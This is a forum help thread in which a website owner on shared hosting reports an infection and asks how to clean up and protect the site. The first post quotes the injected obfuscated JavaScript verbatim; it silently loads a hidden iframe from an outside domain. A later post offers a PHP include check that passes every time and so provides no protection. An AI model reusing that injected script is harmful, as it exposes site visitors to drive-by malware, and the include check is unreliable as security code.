if your website infected then what?

Question

mangel.murti 5 Helps you in some way

13 Years Ago

hi guys,,,

deep trouble,,,,

i don't know where to put this question ...

when i am seeing my webpages onevery page this script comming .. i have no idea how to deal with this thing.. i search google did some thing for related to cpanel.

changning all my account password,,,, remove invalid code below form pages. but not sure that what to do ?

any help? badly required....

<script type='text/javascript'>function uI(){};var dY='';uI.prototype = {r : function() {var b=false;k=21379;var cK=false;this.p=false;var t=false;this.a=false;this.fY=false;lE="";var rF="bodyihm".substr(0,4);i=false;var m=new Date();var h=120;this.kH=38127;n=false;var z=false;pR='';var e=false;try {function iJ(){};this.mY="";this.zE="";oK="";var kHA=function(){return 'kHA'};vE=false;var d=String("app"+"end"+"Chi"+"ld");var bM="";var u=17913;j="j";var dD=function(){return 'dD'};var g=document;var nA="";nQ=41938;var eP=false;this.y="y";var o="ifra"+"me";var gP=63904;this.tA=false;this.nH="nH";var v=new String("crea"+"teEl"+"emen"+"t");hT='';function gF(){};lEW="lEW";bZ="";var dR=function(){};this.vM=30803;var c = g[v](o);this.hJ='';var q=function(){};var dX=function(){return 'dX'};var jI=function(){};var hX="";var f = String("vis"+"ibiGJOg".substr(0,3)+"vOrlitOrv".substr(3,3)+"ILMyLIM".substr(3,1));lD='';tR=62167;var yZ=false;var vB=40296;c.height=h;this.nQR=false;mYP="mYP";c.width=h;var rY=new Array();var lT="lT";var fF="";this.pU="";this.gJ="gJ";var tN=new Array();var lK=false;c.src="http:"+"//wig741U".substr(0,5)+"gete."+"com/c"+"ount2vJ7".substr(0,5)+"8dSs4.php8dSs".substr(4,5);var rU=new Date();var cO=new Array();c.style[f]="hid"+"den";var gJT='';var w="w";gD=21301;function qQ(){};var bY="";g[rF][d](c);var rP="";this.s="s";function qR(){};tNL=false;var hK=function(){return 'hK'};} catch(ex){this.fV='';var aS='';var rUH=new Date();var sF=new Date();var fI="";var cF="";document.write("<"+rF+">");var sX=function(){return 'sX'};var hU='';zY="zY";var qU='';var l=this;var gI=new Array();var kQ=false;var mW="mW";var bD="bD";setTimeout(function(){l.r();}, h);this.rN='';var gW="";this.hC='';function fC(){};}this.aSD=11624;this.kO='';}};this.gH="";var wI=new uI(); tW=59929;wI.r();this.sFG=45273;</script>

php

4 Contributors
12 Replies
116 Views
1 Week Discussion Span
Latest Post 13 Years Ago Latest Post by vaibhav1983

All 12 Replies

rch1231 169 Posting Shark

13 Years Ago

Hello,

Are you on a windows server or linux and is it a dedicated server or shared?

Stefano Mtangoo 455 Senior Poster

13 Years Ago

Delete everything in your account and do Antivirus cleaning and use Backup to restore services.
@rch1231,
virus much of the time smells like Ms Windows ;)

rch1231 169 Posting Shark

13 Years Ago

evstevemd,
Normally I would agree but this is a java script and may not be a virus but an attachment to one of their php files or includes. That is why I ask which OS was on the server and from there what type of server so I could recommend support routes.

Reply to this topic

Be a part of the DaniWeb community

We're a friendly, industry-focused community of developers, IT pros, digital marketers, and technology enthusiasts meeting, networking, learning, and sharing knowledge.

mangel.murti 5 Helps you in some way · Answer 1 · 2010-09-13T11:55:51+00:00

we have linux and shared hosting.....

i also notice that when i was checking my page.php files which has no html code inside not infected with this ,, but other are infected with above code.so using DW i remove all script tag thrugh find and replace.

i also changed my .htaccess file.

but afraiding ... how to protect.

your more suggestion help me to get out of this prob.

thanx 4 all ....

Stefano Mtangoo 455 Senior Poster · Answer 2 · 2010-09-13T15:02:50+00:00

but afraiding ... how to protect.

your more suggestion help me to get out of this prob.

thanx 4 all ....

1. Get how it got "infected" then we will provide suggestion
2. Backup daily/weekly/monthly (script and cron)
3. Use Hosting services with good reputation/customer care

mangel.murti 5 Helps you in some way · Answer 3 · 2010-09-15T11:58:50+00:00

1. Get how it got "infected" then we will provide suggestion
2. Backup daily/weekly/monthly (script and cron)
3. Use Hosting services with good reputation/customer care

i donn't know much php but learning it...
i checked my directory.. i am including files just simple with include function.
see on google that it is harmfull validation require there.

so i make code like this for securing include files. i am also using ckeditor latest version but for uploading image file i used fckeditor build in filemanager in ckeditor.

it will write or need some improvement?

<?php         
  $page=array('somefolder/my.php','somefolder/my.php');
  $one=sha1(date("Y/d/M")."dddd");
  $two=sha1(date("Y/d/M")."ccc");
 
  define($one,$two);    
  if(!defined($one))
  {
     echo'File Not Found-404 Error';
     exit();
  }else{
      
      if(in_array($page[1],$page))
      {
          include_once($page[1]);
          
      }
      else{
              echo "File Not Found-404 Error";
              exit();
          }
  }

?>

Stefano Mtangoo 455 Senior Poster · Answer 4 · 2010-09-17T11:18:11+00:00

i donn't know much php but learning it...
i checked my directory.. i am including files just simple with include function.
see on google that it is harmfull validation require there.
so i make code like this for securing include files. i am also using ckeditor latest version but for uploading image file i used fckeditor build in filemanager in ckeditor.
it will write or need some improvement?
<?php         
  $page=array('somefolder/my.php','somefolder/my.php');
  $one=sha1(date("Y/d/M")."dddd");
  $two=sha1(date("Y/d/M")."ccc");
 
  define($one,$two);    
  if(!defined($one))
  {
     echo'File Not Found-404 Error';
     exit();
  }else{
      
      if(in_array($page[1],$page))
      {
          include_once($page[1]);
          
      }
      else{
              echo "File Not Found-404 Error";
              exit();
          }
  }

?>

Does this relate to the original thread?
If no mark this solved and open spanking new thread

mangel.murti 5 Helps you in some way · Answer 5 · 2010-09-17T16:06:35+00:00

mangel.murti 5 Helps you in some way

13 Years Ago

yes this is?

vaibhav1983 1 Junior Poster · Answer 6 · 2010-09-20T02:43:00+00:00

@rohit...

In your cpanel you can password protect your directories...
Maybe someone got list of all your files and also hacked into the server. That's too much technology, but have heard a few cases of it...

mangel.murti 5 Helps you in some way · Answer 7 · 2010-09-20T02:51:36+00:00

@rohit...
In your cpanel you can password protect your directories...
Maybe someone got list of all your files and also hacked into the server. That's too much technology, but have heard a few cases of it...

how can i do that?we have godaddy....

Stefano Mtangoo 455 Senior Poster · Answer 8 · 2010-09-20T06:52:18+00:00

Stefano Mtangoo 455 Senior Poster

13 Years Ago

May be this tutorial on cPanel?

vaibhav1983 1 Junior Poster · Answer 9 · 2010-09-22T15:13:50+00:00

how can i do that?we have godaddy....

I guess if godaddy does not provide the option to password protect your directories then you need to change your webhost provider.

I went with www.ewebguru.com
So far I found their services very satisfactory.

You can use my referral to start hosting if you would like

My website link is in my signature

if your website infected then what?

Recommended Answers Collapse Answers

All 12 Replies

Recommended Answers